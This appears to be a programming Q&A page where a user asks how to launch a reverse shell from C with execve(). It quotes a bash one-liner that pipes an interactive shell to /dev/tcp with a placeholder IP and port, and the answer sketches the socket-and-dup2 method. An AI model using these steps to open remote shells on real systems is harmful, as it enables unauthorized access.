Reputation: 16837
Execute reverse shell using execve()
I need to run a reverse shell using execve. I know how to run it from command line as follows:
$ /bin/sh -i > /dev/tcp/IP_ADDR/PORT 0<&1 2>&1
I can run a simple version of /bin/sh call as follows:
#include <stdio.h>
int main() {
char *args[2];
args[0] = "/bin/sh";
args[1] = "-i";
args[2] = NULL;
execve(args[0], args, NULL);
}
I am not able to figure out how to run the rest of the command. I tried assigning the remaining string > /dev/tcp/IP_ADDR/PORT 0<&1 2>&1 as individual elements in the args array. When I run that it reports that Can't open >.
Is the reverse shell command I mentioned executable via execve() ? If so, what would be the right way to do it ? Thanks.
Upvotes: 1
Views: 1548
Answers (1)
Reputation: 60117
The /dev/tcp/*/* files don't exist. They're an abstraction that only exists in some shell (bash, ksh). You'll need to do regular socket programming in your C program (socket, bind, listen, accept and then dup2 the socket on the standard IO descriptors of the shell you spawn).
You should also fix the overflow in the array.
An initialization such as char *args[] = { "/bin/sh", "-i", 0 }; should be less error prone.
Upvotes: 1
Related Questions
- How can I execute terminal commands from a C program?
- C execve() parameters [spawn a shell example]
- execve on linux, execute from arguments
- Execute shell program with execv
- Implementation of Execv() instead of execvp()
- execve in unix systems
- Execve invoking
- running shell script using c programming
- Writing a shell in C, doesn't return anything
- UNIX simple shell in C, execve and parameters